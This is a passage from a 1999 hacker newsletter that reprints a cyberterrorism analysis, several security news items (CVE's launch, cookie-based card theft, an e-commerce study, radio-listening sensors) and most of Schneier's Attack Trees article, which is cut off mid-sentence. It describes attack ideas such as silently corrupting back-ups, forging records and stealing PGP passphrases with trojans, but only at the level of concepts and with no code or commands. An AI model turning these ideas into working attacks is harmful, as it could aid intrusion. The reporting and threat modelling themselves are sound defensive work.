(spoofing). As indicated previously, DoS attacks take the form of overloading the processes of the computer hosting the website (the server), which then shuts itself down. Recently, a new form of such attacks has become prevalent - the 'distributed co-ordinated attack' - in which thousands of servers are used in unison. "It's possible to detect the attack, but it is very hard to block it using current software," said Thomas Longstaff, senior technical researcher for the Software Institute at Carnegie Mellon University. However, a co-ordinated attack to bring down a government's or a corporation's computer systems cannot be maintained long enough to be little more than a nuisance. Yet while only annoying at the moment, as interconnectivity increases and the importance of the online economy becomes manifest, such exploits will have serious financial implications. That said, recovery from such an attack tends to be fast. Erasing is considered very difficult to conduct because any system worth attacking is also worth backing up. UK and US interbank transactions are backed up daily with multiple remote tapes, so any cracker wanting to destroy the interbank market will cause the loss of at most one day's transactions. However, this is not without consequence: consumer confidence in the banking system might drop to unprecedented levels were exploits to be publicised. Viruses are a form of erasure most computer users are familiar with. Indeed, as a teenager Robert Morris accidentally launched a virus that shut down most of the Unix-based computers in the USA in the 1980s. Much can be said for judging the security implications of information technology by the fact that virus protection is now standard on any company computer. A good thing too, as 1999's 'Melissa virus' was the first of a new generation of Microsoft-targeted viruses that are self-replicating by sending themselves forward in an email entitled 'Important message from . . .' to the people listed in a person's Outlook Express email package without their knowledge. The 'Bubbleboy' virus promises to be worse, as you just have to receive it to be affected. Erasing attacks can be guarded against through multiple, remote (in both geography and network topology) back-ups, taken at sufficient frequency that the maximum possible loss is bearable for the system (the 'safe frequency'). Any system for which the safe frequency is too low for the defence to be practical (such as a power grid) tends be kept remote from networks, although this is not always the case. Yet for every solution there is a problem. The effectiveness of back-ups can be circumvented by malicious programming that corrupts one random byte in the data; even though the back-ups look good, the data is bad. There is no way of telling unless the whole tape is recovered to find the one or two data files that have changed and examining them 'with a microscope'. The problems are obvious if someone had 10 weeks of back-ups, each with different bits of bad data, and all the back-ups were infected. There would be no way to know which data was good and which was bad. Indeed, if the cracker knows enough about the system he/she is attacking, recovery may be impossible. Spoofing is much more difficult to guard against. This kind of attack comes in two guises: attempts to create phoney records or phoney messages in a system (such as creating false bank accounts); or attempts to create phoney instructions to the processing system, causing a failure of the system. This is as bad as an erasing attack. The easiest way to defend against non-destructive spoofing is again to use back-ups and to operate double-entry book-keeping, which traces every record to its creation and requires consistency between numerous (again, preferably topologically remote) sources. This multiplies the difficulty of an attack as the attacker has to break several systems instead of just one. By appearing to be a user, however, a cracker could manipulate data or corrupt the hardware by installing a virus, for example. While this would not be quite like a bomb going off, it could have much worse long-term repercussions. The Internet Auditing Project Host count: 36,431,374 Vulnerability count: 730,213 Vulnerable host count: 450,000 Destructive spoofing aimed at the processor rather than its records is a different matter. Causing the processor to execute phoney instructions could allow an attacker to erase records, transmit phoney messages and, potentially, cover his/her tracks well enough to escape consistency checks. This kind of attack is more difficult than any other - usually the only way to get another machine to execute rogue instructions is to exploit 'buffer overflows', overloading the temporary data buffer on computers. Nightmare scenarios are based on such attacks. "We could wake one morning and find a city, or a sector of the country, or the whole country having an electric power problem, a transportation problem or a telecommunication problem because there was a surprise attack using information warfare,'' claims Richard Clarke, the US National Security Council adviser who heads counterterrorism efforts. Whilst alarmist, precedents do exist, as evidenced by Gail Thackaray, recognised as one of the premier cracker-catchers in the business: "One hacker shut down a Massachusetts airport, 911 emergency service and the air traffic control system while playing with the municipal phone network, and another hacker in Phoenix invaded the computer systems of one of the public energy utilities, attaining 'root' level privileges on the system controlling the gates to all the water canals from the Grand Canyon south." These examples involved individuals rather than organised groups, and none of them were politically motivated. Cyberterrorism? In warfare as well as in business, IT is the great equaliser. Its low financial barrier to entry relative to heavy industry allows even the poorest organisations an IT effectiveness equal (or nearly equal) to large corporations. The greatest advantage the covert warfare arms of major nation-states (such as the CIA or Mossad) have over small terrorist organisations is the financial wherewithal to develop massive intelligence networks using the best equipment. IT levels the playing field in this regard. Because sensitive military computers are required to be kept as far away from the Internet as possible, unless there was some major oversight or an incidence of social engineering, a military system cannot be directly attacked. However, there is always a weak link in the chain: for example, an army depends on Vendor A for supplies/ equipment, and Vendor A depends on parts from Vendor B, and so on. Somewhere in that chain is a vulnerability due to the massive networks, technological dependence and just-in-time ordering systems. Indeed, although direct attacks on critical infrastructure are unlikely, if on a network that has a link into it elsewhere, then one vulnerability is all it takes. Strikes in one automotive plant have effectively shut down large car makers. Most US automotive plants are also government contractors supplying vehicles and replacement parts to the military: an obvious target for planting viruses during war. Some people collect baseball cards, others analyse protocols Cyberterrorism is not only about damaging systems but also about intelligence gathering. The intense focus on 'shut-down-the-power-grid' scenarios and tight analogies with physically violent techniques ignore other more potentially effective uses of IT in terrorist warfare: intelligence-gathering, counter-intelligence and disinformation. Disinformation is easily spread; rumours get picked up by the media, aided by the occasional anonymous e-mail. Cracking into a government server and posting a new web page looks impressive and generates publicity, but cracking into a government server and reading private email is much more valuable to terrorists. This gives cyberterrorists valuable details about the thought and operations of their adversaries, and can aid in planning conventional attacks. Furthermore, if terrorists can penetrate the security of an enemy organisation's computer networks, they do not need to do any damage to be militarily effective. Rather, they can quietly copy information to process at their leisure, without having to physically smuggle it out of secure facilities. False or misleading information can be planted in (or deleted from) databases, undermining the effectiveness of organisations relying on that information. In today's environment, authentication via strong encryption is still rare and IT makes forgery easy. Credentials can be forged to fool authorities or the media for purposes of disinformation or to enhance covert physical activities. As pointed out by Clifford Stoll in The Cuckoo's Egg, automated 'data mining' techniques can be used to search for useful patterns in vast stores of insecure and seemingly unrelated data. A bank may assume its electronic fund transfer system is the most vital system to protect, but a terrorist may only want access to the financial records of persons or groups that are the bank's customers. This may not even involve destruction of data, as the pure information is often much more valuable than simply destroying random records. Reconnaissance attacks such as these are difficult to stop but extremely damaging. In the long-term banking scenario, the terrorist may simply choose to track sources of funding based on deposit records to harm the person or group who is the target. In a situation like this, going into the bank to destroy the information is only a temporary setback and will raise attention. Why destroy a valuable point of information gathering by doing something short-term like disrupting operations? Nevertheless, for the terrorist, cracking might be used for more than just destroying data. Attacking an information system would be a good way to either distract the target or otherwise enable the terrorist to perform a physical attack. An example might be to crack into an airline and delete transport manifests to cover the transport of illegal materials. Had Shoko Asahara and the Aum Shinrikyo group been able to crack the Tokyo power system and stop the subways, trapping passengers on the trains, the number of casualties caused by their 1995 Sarin gas attack might have been significantly larger. If a determined group wanted to bring New York to its knees, what better way than to combine a physical bombing campaign with simultaneous IT attacks on the power grid, hospitals, emergency services and the media? Turning to the larger picture, in warfare the party that runs out of funds first loses. Thus, the objective of warfare may not just be to inflict as much physical damage as possible, but instead be to maximise financial damage. The Irish Republican Army (IRA) learnt to use this concept very effectively in recent years, sufficiently occupying the resources of the British government through infrastructural attacks (as opposed to direct attacks against people). This suggests that, in the future, stock markets or other primary financial institutions might become high-profile targets and the most effective means of accomplishing a terrorist's goal. More damage would be accomplished by taking the New York Stock Exchange offline for a few days rather than actually bombing a building. That said, financial institutions are one of the few parties recognised in the hacker community for taking their security very seriously indeed. Given the predominance of the IT-based industry and the familiarity of the Internet in the USA and Western Europe, the terrorist groups that fit the motive and mindset to use cracking could be closed religious or fanatical groups whose value systems are so out of sync with the mainstream that they feel threatened enough to take as much of the world with them as they 'go under'. That, together with 'lone gunmen' and activism campaigns - 'hacktavism' - are scenarios that appear to fit the profile. A Pakistani Internet hacker known only as 'Dr Nuker', for example, has a message for Americans: he and a cybercohort, one 'Mr Sweet', have not yet begun to fight. The idea of Third World cyberpunks threatening the planet's sole superpower might seem unlikely - unless, of course, you run Internet sites at Lackland AFB or 86 other facilities their group that the 'Pakistan Hackerz Club' (PHC), has struck in the past five months. The PHC's self-described founder and perhaps the world's most prolific Web cracker today, Dr Nuker admits he's a revolutionary, a 'cyberterrorist' with a cause: freedom for Indian-controlled Kashmir. Yet by penning anti-Indian missives on Internet sites run by the Naval Reserve Maintenance Facility in Ingleside, the Karachi Stock Exchange and even the Disney Guide, Dr Nuker not only has become a high-profile 'hacktivist' - a computer cracker with a political or social goal - but a wild card who hints he can wreak havoc far from home. "We don't have any intentions to compromise any sort of military or governmental database, but in case there will be a cyber war with Pakistan, then we will sure prove our knowledge, ability and skills," he warned in an e-mail message. It may be no idle boast. Today, employers, even those running critical infrastructure, are hard-pressed to not give employees Internet access; 401k retirement plans, health insurance plans and others are starting to mandate it. Most employees are on insecure, poorly administered, unreliable desktop operating systems: the recipe for serious electronic mayhem. Beyond the hype Critics maintain there is no such thing as cyberterrorism, and there is undoubtedly a lot of exaggeration in this field. If your system goes down, it is much more interesting to say it was the work of a foreign government rather than admit it was due to an American teenage 'script-kiddy' tinkering with a badly written CGI script. If the power goes out, people light a candle and wait for it to return, but do not feel terrified. If their mobile phones switch off, society does not instantly feel under attack. If someone cracks a web site and changes the content, terror does not stalk the streets. Some groups talk of taking down power grids; while that would help in conjunction with another type of attack, in itself it would be useless. Most grids suffer infrequent black-outs anyway that are not terrorist-related. In fact, terrorism campaigns using just computers are unlikely. The sheer size of programmes works against the attacker more than the defender. No one person can fully understand a programme comprising over a million lines of code, especially if he/she did not write it, and the defender has more people available. Critical programmes that run infrastructure functions, such as traffic lights, are usually custom-written, making them twice as difficult to attack. Any system put together in the last few years will have been implemented with security in mind. Ironically, Y2K could prove to be a boon, as audits will give detailed reports on exactly what is in a system and this information can be used to boost security. Most security-aware organisations do not put highly sensitive (such as military or corporate) data on servers that are accessible via the Internet and design their Internet servers to be disposable and easily reinstalled from compact disc (CD) or tape. These organisations also typically keep their servers in restricted-access areas. Most organisations with sensitive data also keep off-site back-ups. Write-once CDs are becoming very popular as they are inexpensive, compact and convenient to restore from. To cause serious and lasting damage, a terrorist would need to destroy or corrupt not only the contents of the servers, but also the off-site back-ups. Reality bytes In theory, cyberterrorism is very plausible, yet in reality it is difficult to conduct anything beyond simple 'script-kiddy' DoS attacks. Terrorists attempting to sway a populace by fear would therefore be less interested in such an attack unless they could carry out an extremely damaging one on a repeatable basis or unless they used it to augment the effects of a physical attack. As things stand, while a terror attack using crackers is potentially highly destructive, the psychological impact of the disruption of services is still much lower than that of a direct physical attack. Johan J Ingles-le Nobel is Deputy Editor of JIR, having previously obtained his Masters at St Andrews University. He gratefully thanks the contribution and advice of people at Slashdot.org. @HWA 17.0 Car Radio Listening Habits Being Gathered ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Think your safe from the prying eyes of the data collector when you're peacefully driving your car and listening to the radio? Think again. New technology being tested in Atlanta, Toronto, Los Angeles and Phoenix can remotely determine what radio station you are listening to in your car. Small shoebox-size electronic sensors posted on billboards and light poles can listen to the signal from the oscillator in the car radio, determine the frequency and log the information in a central database. This information is then made available to subscribing radio stations in real time to help in determining ratings numbers. (Even though this system does not collect demographic data, can't collect AM yet, and doesn't listen to homes or businesses, it is still scary as hell.) The Atlanta Journal Constitution http://www.accessatlanta.com/partners/ajc/newsatlanta/radio/index.html Getting with the program WCNN to debut as issue-oriented talk radio geared to Atlanta's black audience We've got rock, rap, country, salsa and smooth jazz. But come April 3, Atlanta will have a new radio format - black news/talk. That's when Midwestern Broadcasting, owner of adult R&B station Kiss 104.7, will take over programming of WCNN/680 AM from Cox Radio and launch a 24-hour news/talk station aimed at Atlanta's African-American community. According to Midwestern Vice President David Dickey, the station will emphasize local programs rather than syndicated shows, and focus on issues such as education, government, health care and the economy. In the next few weeks, the company will announce the station's new name, unveil a logo and begin hiring on-air talent. The takeover will end WCNN's lineup of news/talk shows, including Tom Hughes in the morning, the syndicated G. Gordon Liddy show at midday and Neal Boortz producer Royal Marshall's talk show in the afternoon. "I don't think Neal [Boortz] or Dr. Laura [Schlessinger] are focused on the needs and issues of the average African-American listener," Dickey said, referring to popular programs on news/talk stations WSB-AM and WGST-AM/FM. "If we are here to serve the black community, programming has to originate from that community. If you had to pick any city in America to support this effort, Atlanta is the city to do it." According to Arbitron, the company that provides radio ratings, 769,000 of Atlanta's 3 million radio listeners ages 12 and older are black. As news of the venture trickled into the radio community Tuesday, many industry observers seemed to believe that a black news/talk station would be a savvy addition to Atlanta's increasingly competitive and lucrative radio market. At 50,000 watts in the daytime and 10,000 watts at night, WCNN is the second-strongest AM signal in town, behind WSB. "Oooh, that's smart," said Star 94 general manager Mark Kanov upon hearing the news. "A market like Atlanta would certainly have a strong core for a station like that. On the surface, it seems like it would have a very strong appeal." "It's what I would do if I owned the station," said Andrew Saltzman, general manager of Sportstalk 790/The Zone. "Talk radio is a booming format, and that's a [demographic] that's not truly being catered to. Why shouldn't the urban community have full-service talk radio?" Black news/talk is not a new idea. The format has been successfully adopted by WOL in Washington and WLIB in New York. But because there was usually only one per community, urban radio stations have not broken into niche formats as quickly as stations geared to white audiences. For example, V-103, Atlanta's top-rated urban station, was the only major FM station catering to the African-American audience until 1992, when Kiss 104.7 signed on the air. V-103 morning host Frank Ski explained how such exclusivity affected the listening habits and expectations of the black radio audience. "For a long time, the lack of radio stations available to minorities meant we didn't have a second or third choice when it came to radio," Ski said. "That made the black community begin to like a whole package of things [on one station]. We want to hear music, hear something funny and be informed. Black talk can be good for the market if it's done right. The difficulty is that because we haven't really had it, there's not a lot of good, available talent to do it. They will be competing with the white news-talk stations, so they really need to have their game together." Midwestern Broadcasting, which is owned by the Dickey family, has specialized in creating formats for the African-American community, such as the adult R&B of Kiss 104.7 and the contemporary gospel of Glory 1340 AM. However, some have raised questions as to whether white management is politically or socially motivated. Ryan Cameron, morning man at rap station Hot 97.5, wonders whether Midwestern will take the new station into the community as much as he or Ski do with their shows. "Anything that's going to make the market more interesting is definitely a plus," Cameron said. "It's great to raise issues and talk, but how visible will they be? It's not like they got new owners. I'll be curious to see how much involvement there will be in the community other than monetary." Dickey doesn't believe that a black news/talk station with white ownership will cripple its chances of success. "Race has nothing to do with it, it just makes good economic sense," he said. "Sure, we're trying to make a buck off this. But more important, we've been able to provide a choice for African American listeners in Atlanta. As a broadcaster, it's my responsibility to research the market and find the opportunties that are there. We have two well established radio stations in Kiss and Glory, and this is an extension of that niche. I don't care if you're white, black, Chinese, male, famale, young or old, it doesn't make sense to go up against established stations like WSB or WGST. [A black news/talk station] complements our package. We can cross-promote each station with the other two. We can utilitze people who appear on one and put them on the other." The transaction does not involve the sale of 680 AM, rather a switch in who is calling the shots about what is on the air. For five years, Midwestern Broadcasting, which owns the frequency, has leased 680 AM to Cox Radio, owner of news/talk giant WSB-AM (750). Cox Radio has spearheaded programming, first as a sports-talk station (680/The Fan), then turning WCNN into a news/talk station in 1997. The lease between the two companies expires April 2. According to Marc Morgan, co-chief operating officer of Cox Radio, the decision to end the arrangement was mutual. "When we made this [leasing] deal five years ago, it made great sense at the time and served the purpose it was meant to serve," he said. "There's definitely a hole in the market for a black talk station, and I think it's a good idea. ... I haven't heard it yet, so I couldn't even begin to speculate on what effect, if any, it would have on any other station in town." @HWA 18.0 CVE by Mitre Goes Online ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The Common Vulnerabilities and Exposures database run by Massachusetts defense contractor Mitre has gone online. The database hopes to help standardize computer security terms and set a common vocabulary for building more secure systems. The database hopes to contain all known system vulnerabilities. (It is unlikely that any of the big 5 security companies will give up new vulnerabilities that only they know about for their competitors to find in this database. The database is already missing some key advisories that have been publicly released.) The Boston Globe http://www.globe.com/dailyglobe2/335/business/Handle_on_hackers%2b.shtml Common Vulnerabilities and Exposures Database http://www.cve.mitre.org/ Handle on hackers Bedford firm seeks security standard with software-weakness list By Ross Kerber, Globe Staff, 12/01/99 BEDFORD - Before the invention of the periodic table in 1869, chemists struggled to put elements such as hydrogen and lithium into a coherent classification scheme. Today, parts of the field of computer science now seem stuck with the same lack of organization. In particular there is little agreement among software security specialists on just how to classify the sections of computer code that are often targeted by hackers. Government and academic groups have attempted to categorize these software Achilles' heels for years, to little commercial enthusiasm. But now some steam is gathering behind a project run by Bedford-based Mitre Corp. to create a simpler listing of weaknesses. The project doesn't try to classify codes and other security problems into families or types, but only to list them as part of what Mitre calls a directory of ''Common Vulnerabilities and Exposures.'' By dumbing down its directory, known as the CVE, Mitre has persuaded 23 organizations including Cisco Systems Inc. and IBM Corp. to participate. The result can be found on line at www.cve.mitre.org, and executives hope it will help standardize terms and set a common vocabulary for building more secure systems. ''The beauty of the approach we've taken is to avoid everybody arguing'' about complicated categorizations, said Steven Christey, a software engineer at Mitre, a nonprofit government contractor. His colleague, David Mann, compares the CVE to the lists of individual elements that were drawn up long before the periodic table was accepted. ''To get things going scientifically we really need to start small,'' Mann said. ''Hopefully it will spawn more categorizations, eventually.'' While software viruses are quickly studied and named, the security weaknesses they attack vary widely and are far more difficult to classify. Consider the various names given for a type of code used by many Web sites known as the ''common gateway interface,'' or cgi, generally used to connect the site to on-line sources such as telephone directories. Altering such code can cause big disruptions to the sites, a weakness known as ''CA-96.06.cgi-example code'' by CERT, a well-known computer-security center at Carnegie Mellon University. Meanwhile CyberSafe Corp., an Internet security firm based in Issaquah, Wash., discusses the same weakness as an ''HTTP `phf' Attack.'' While both continue to use those names, they also have begun to include in their advisories the name chosen by Mitre for the condition: ''CVE-1999-0067,'' meaning that the problem was the 67th identified under the CVE effort this year. Eventually they might drop their own terminologies altogether, said Bill Fithen, a CERT security analyst. ''If CVE catches on, there might truly be no legitimate reason to continue'' using older names, he said. For Mitre, CVE represents a chance to show off the commercial benefits of its work for government agencies. Founded in 1958 by a group of researchers formerly associated with MIT's Lincoln Laboratories, Mitre has chiefly been known as a contractor on aerospace and classified military projects, with offices from Fort Leavenworth, Kan., and Washington, D.C., to Seoul. The company also has branched out into the civilian sector and now runs research centers for the Federal Aviation Administration and the Internal Revenue Service. In 1996 Mitre spun off divisions that did research in space, environment, and telecommunications. It still has about 4,000 employees worldwide and reported revenue of $542 million for its latest fiscal year. At the behest of the Pentagon, Mitre several years ago began research in areas of ''critical infrastructure protection''; 15 of the company's employees now are involved in a FBI anti-hacking center in Washington, D.C. The CVE is rooted in such work, dreamed up by Mann after he was assigned last year to create a database to protect the company's computers. Mann wanted to automatically compare alerts issued by CERT and other security groups with an analysis of traffic on Mitre's computers, but Mitre's programmers were using different terms. ''I realized we needed a way to put these things together,'' said Mann, 37, who holds a doctorate in mathematics and once taught at a US Navy postgraduate program in California. Mann developed the idea with Christey, 32, a senior software engineer, and last January they presented a paper at a conference at Purdue University in Indiana, sparking broader commercial interest. Now many attendees of that conference are members of CVE's 25-member editorial board made up of software vendors, analysts, and academics, and headed by Christey. So far the group has agreed to assign numbers to about 320 vulnerabilities, and hopes to get to 665 by the end of the year. Like many business consortiums, the CVE board also includes members who aren't so enthusiastic. Some worry their competitors will learn their secrets. ''CVE will only contain vulnerabilities that are old or not interesting,'' said Marcus Ranum, chief executive of closely held Network Flight Recorder in Woodbine, Md. To monitor possible breakthroughs Ranum has assigned an employee to join the CVE board, which holds conference calls periodically to discuss new entries. But the board member won't give away too much, Ranum says. ''It puts me in a delicate spot as a vendor,'' he said. ''If I were going to make CVE useful I'd give all my information to CVE. But then my competitors would have it and my shareholders would kill me.'' But other CVE participants say they hope the list will demystify their work to corporate customers and boost sales. ''Generally people can get pretty confused when you try to sell them software,'' said Andre Frech, a researcher at Internet Security Systems in Atlanta, which recently began including CVE numbers in a detection database. Internet Security Systems' founder, Christopher Klaus, says the CVE might someday even become the basis of ''hacker insurance'' policies for companies to minimize the impact of technical disruptions. Without CVE or something like it, he said, ''it would be hard even to set the premiums ... because people couldn't be specific enough about what they might be selling.'' If CVE catches on, it will please specialists who have tried to develop more complex classification schemes with little notice, like Eugene Spafford, a computer scientist at Purdue who ran the conference where Mann and Christey first presented their paper. Four years ago Spafford began building his own open database of computer security flaws, but found few companies could agree on organizing criteria. In contrast, he said, CVE has already achieved ''a lot more buy-in than has happened in the past.'' This story ran on page C01 of the Boston Globe on 12/01/99. © Copyright 1999 Globe Newspaper Company. @HWA 19.0 Novell Head Victim of Online Credit Card Theft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Novell chief Eric Schmidt has admitted that he has been the victim of credit card theft. Speaking at San Francisco's Digital Economy conference he blamed the theft of his personal information on browser cookies. He labeled cookies as "the biggest disaster for computers in the past [few] years." ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2403346,00.html?chkpt=zdnntop Novell chief's credit card stolen online Eric Schmidt blames cookies for cyber theft -- calls cookies 'one of the biggest disasters for computers.' By Ben Elgin, Sm@rt Reseller UPDATED December 2, 1999 3:26 PM PT Novell chief Eric Schmidt knows firsthand the problem of Internet fraud. Speaking at San Francisco's Digital Economy conference Thursday, Schmidt informed the crowd that his credit card number had been stolen over the Internet in the past. Although he isn't sure exactly how his card number was lifted, Schmidt says he believes it was through a mechanism that reads the cookies-files sitting on a user's desktop and storing personal information, such as passwords and preferences. "Cookies are one of the biggest disasters for computers in the past [several] years," says Schmidt, citing the lack of security and the blatant breach of consumer privacy. As Novell's chairman and CEO, Schmidt is trying to oust cookies with his company's new "digitalme" online identification-management service. Based on Novell Directory Services technology, digitalme is aiming to store and consolidate a user's multiple passwords, address books, favorites lists and purchasing preferences. "Cookies are a great idea, [but] they are just stored in the wrong place," says Schmidt. Schmidt's brush with cyber thieves may have left him wary, but not a whole lot poorer. "My liability was $50 ... [but] I'm not sure what the credit card company's liability was." he says @HWA 20.0 IDC Says E-Commerce Unsafe Most of the Time ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Deepquest The most recent Technology Integration Panel Study, conducted by International Data Corporation paints a grim picture of online security. Consumers have worried about the security of their online transactions, and this study seems to justify those fears. The study, entitled E-Commerce Solutions: Customer Directions and Segmentation by Company Size and Industry" explores various market segments currently using e-commerce systems and what the potential is for the future. (Unfortunately the data for this study is already six months old and had an extremely small sample size. Hopefully a more comprehensive study can be conducted soon.) South China Morning Post http://www.technologypost.com/enterprise/DAILY/19991202103702261.asp?Section=Main Published on Thursday, December 2, 1999 ENTERPRISE Online transactions are not all secure, says study NEWSBYTES Consumers have worried about the security of their online transactions, and a new study by International Data Corporation (IDC) justifies their fears. According to IDC's most recent Technology Integration Panel Study, one in five large companies (those having 1,000 or more employees) is likely not to have a secure transaction option available. In small companies, (10-99 employees) the ratio of firms not having a secure transaction option rises to one in three. "Information technology is again changing the business landscape, offering the potential for better products and services delivered to corporations, governments, and consumers alike through the engineering of e-solutions," said Carey Azzara, program director of IDC's "Corporate Computing: Vertical Views" research. "However, realising this potential is not easy and certainly not without pitfalls for the vendors trying to bring the world into this new paradigm." Mr Azzara emphasised the point that unless companies have a secure means of accepting payment for a transaction, whether that transaction is e-retail or business-to-business, they are not engaging in e-commerce; rather, they are engaging in e-business, which is not the same. "I will pick a secure server all the time," Mr Azzara said when discussing how payment is be made online. Under no circumstances, he cautioned, should credit card numbers be given in a non-secure environment. In fact he would not accept a secure-transaction logo on a Web site, but would make sure that the online merchant's server was really secure with encryption and authentication capabilities. Over 40 per cent of the survey's respondents reported that they paid a premium for better e-commerce system performance. The study found Microsoft had the largest hold on the market, but Netscape, IBM, and Oracle were seriously considered by 25 per cent of the responding companies. The full study, entitled "E-Commerce Solutions: Customer Directions and Segmentation by Company Size and Industry", explores the market segments currently using e-commerce systems and how the potential for future business is shaping up. The study, conducted during July 1999, sampled 974 US and Canadian companies, stratified by size and industry, and was weighted to reflect information and communication technology of each marketplace. Mr Azzara said consumers should "go ahead, make the phone call" when passing over credit card information unless the security of the site was established. The message of the survey, he said, is: "Buyer beware! Don't be a victim." Additional information about IDC is available at www.idc.com. Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved. @HWA 21.0 Attack Trees Help to Model Security Threats ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench With new security weakness showing up on a daily basis how do you model threats against computer systems? Bruce Schneier has come up with a formal methodology for analyzing the security of systems and subsystems, known as 'Attack Trees'. Dr. Dobb's Journal http://www.ddj.com/articles/1999/9912/9912a/9912a.htm Attack Trees Dr. Dobb's Journal December 1999 Modeling security threats By Bruce Schneier Bruce is the CTO of Counterpane Internet Security, author of Applied Cryptography, Second Edition (John Wiley & Sons, 1995), and inventor of the Blowfish and Twofish encryption algorithms. You can contact Bruce at http:// www.counterpane.com/. Few people truly understand computer security, as illustrated by computer-security company marketing literature that touts "hacker proof software," "triple-DES security," and the like. In truth, unbreakable security is broken all the time, often in ways its designers never imagined. Seemingly strong cryptography gets broken, too. Attacks thought to be beyond the ability of mortal men become commonplace. And as newspapers report security bug after security bug, it becomes increasingly clear that the term "security" doesn't have meaning unless also you know things like "Secure from whom?" or "Secure for how long?" Clearly, what we need is a way to model threats against computer systems. If we can understand all the different ways in which a system can be attacked, we can likely design countermeasures to thwart those attacks. And if we can understand who the attackers are -- not to mention their abilities, motivations, and goals -- maybe we can install the proper countermeasures to deal with the real threats. Enter Attack Trees Attack trees provide a formal, methodical way of describing the security of systems, based on varying attacks. Basically, you represent attacks against a system in a tree structure, with the goal as the root node and different ways of achieving that goal as leaf nodes. Figure 1, for instance, is a simple attack tree against a physical safe. The goal is opening the safe. To open the safe, attackers can pick the lock, learn the combination, cut open the safe, or install the safe improperly so that they can easily open it later. To learn the combination, they either have to find the combination written down or get the combination from the safe owner. And so on. Each node becomes a subgoal, and children of that node are ways to achieve that subgoal. (Of course, this is just a sample attack tree, and an incomplete one at that. How many other attacks can you think of that would achieve the goal?) Note that there are AND nodes and OR nodes (in the figures, everything that isn't an AND node is an OR node). OR nodes are alternatives -- the four ways to open a safe, for example. AND nodes represent different steps toward achieving the same goal. To eavesdrop on someone saying the safe combination, attackers have to eavesdrop on the conversation AND get safe owners to say the combination. Attackers can't achieve the goal unless both subgoals are satisfied. That's the basic attack tree. Once you have it completed, you can assign values -- I (impossible) and P (possible) in Figure 1 -- to the various leaf nodes, then make calculations about the nodes. (Again, this is only an illustrative example; do not take the values as an indication of how secure my safe really is.) Once you assign these values -- presumably this assignment will be the result of painstaking research on the safe itself -- you can calculate the security of the goal. The value of an OR node is possible if any of its children are possible, and impossible if all of its children are impossible. The value of an AND node is possible only if all children are possible, and impossible otherwise; see Figure 2. The dotted lines in Figure 2 show all possible attacks -- a hierarchy of possible nodes, from a leaf to the goal. In this sample system, there are two possible attacks: Cutting open the safe, or learning the combination by bribing the owner of the safe. With this knowledge, you know exactly how to defend this system against attack. Assigning "possible" and "impossible" to the nodes is just one way to look at the tree. Any Boolean value can be assigned to the leaf nodes and then propagated up the tree structure in the same manner: easy versus difficult, expensive versus inexpensive, intrusive versus nonintrusive, legal versus illegal, special equipment required versus no special equipment. Figure 3 shows the same tree with another Boolean node value. Assigning "expensive" and "not expensive" to nodes is useful, but it would be better to show exactly how expensive. It is also possible to assign continuous values to nodes. Figure 4 shows the tree with different costs assigned to the leaf nodes. Like Boolean node values, these can propagate up the tree as well. OR nodes have the value of their cheapest child; AND nodes have the value of the sum of their children. In Figure 4, the costs have propagated up the tree, and the cheapest attack has been highlighted. Again, this tree can be used to determine where a system is vulnerable. Figure 5 shows all attacks that cost less than $100,000. If you are only concerned with attacks that are less expensive (maybe the contents of the safe are only worth $100,000), then you should only concern yourself with those attacks. There are many other possible continuous node values, including probability of success of a given attack, likelihood that an attacker will try a given attack, and so on. Nodes and Their Values In any real attack tree, nodes will have many different values corresponding to many different variables, both Boolean and continuous. Different node values can be combined to learn even more about a system's vulnerabilities. Figure 6, for instance, determines the cheapest attack requiring no special equipment. You can also find the cheapest low-risk attack, most likely nonintrusive attack, best low-skill attack, cheapest attack with the highest probability of success, most likely legal attack, and so on. Every time you query the attack tree about a certain characteristic of attack, you learn more about the system's security. To make this work, you must marry attack trees with knowledge about attackers. Different attackers have different levels of skill, access, risk aversion, money, and so on. If you're worried about organized crime, you have to worry about expensive attacks and attackers who are willing to go to jail. If you are worried about terrorists, you also have to worry about attackers who are willing to die to achieve their goal. If you're worried about bored graduate students studying the security of your system, you usually don't have to worry about illegal attacks such as bribery and blackmail. The characteristics of your attacker determine which parts of the attack tree you have to worry about. Attack trees also let you play "what if" games with potential countermeasures. In Figure 6, for example, the goal has a cost of $20,000. This is because the cheapest attack requiring no special equipment is bribing the person who knows the combination. What if you implemented a countermeasure -- paying that person more so that he is less susceptible to bribes? If you assume that the cost to bribe him is now $80,000 (again, this is an example; in the real world you'd be expected to research exactly how a countermeasure affects the node value), then the cost increases to $60,000 (presumably to hire the thugs to do the threatening). A PGP Example Figure 7 is an attack tree for the popular PGP e-mail security program. Since PGP is a complex program, this is a complex tree, and it's easier to write it in outline form than graphically. PGP has several security features, so this is only one of several attack trees for PGP. This particular attack tree has "read a message encrypted with PGP" as its goal. Other goals might be: "forge someone else's signature on a message," "change the signature on a message," "undetectibly modify a PGP-signed or PGP-encrypted message," and so on. What immediately becomes apparent from the attack tree is that breaking the RSA or IDEA encryption algorithms are not the most profitable attacks against PGP. There are many ways to read someone's PGP-encrypted messages without breaking the cryptography. You can capture their screen when they decrypt and read the messages (using a Trojan horse like Back Orifice, a TEMPEST receiver, or a secret camera), grab their private key after they enter a passphrase (Back Orifice again, or a dedicated computer virus), recover their passphrase (a keyboard sniffer, TEMPEST receiver, or Back Orifice), or simply try to brute force their passphrase (I can assure you that it will have much less entropy than the 128-bit IDEA keys that it generates). In the scheme of things, the choice of algorithm and the key length is probably the least important thing that affects PGP's overall security. PGP not only has to be secure, but it has to be used in an environment that leverages that security without creating any new insecurities. Creating Attack Trees How do you create an attack tree like this? First, you identify the possible attack goals. Each goal forms a separate tree, although they might share subtrees and nodes. Then, try to think of all attacks against each goal. Add them to the tree. Repeat this process down the tree until you are done. Give the tree to someone else, and have him think about the process and add any nodes he thinks of. Repeat as necessary, possibly over the course of several months. Of course there's always the chance that you forgot about 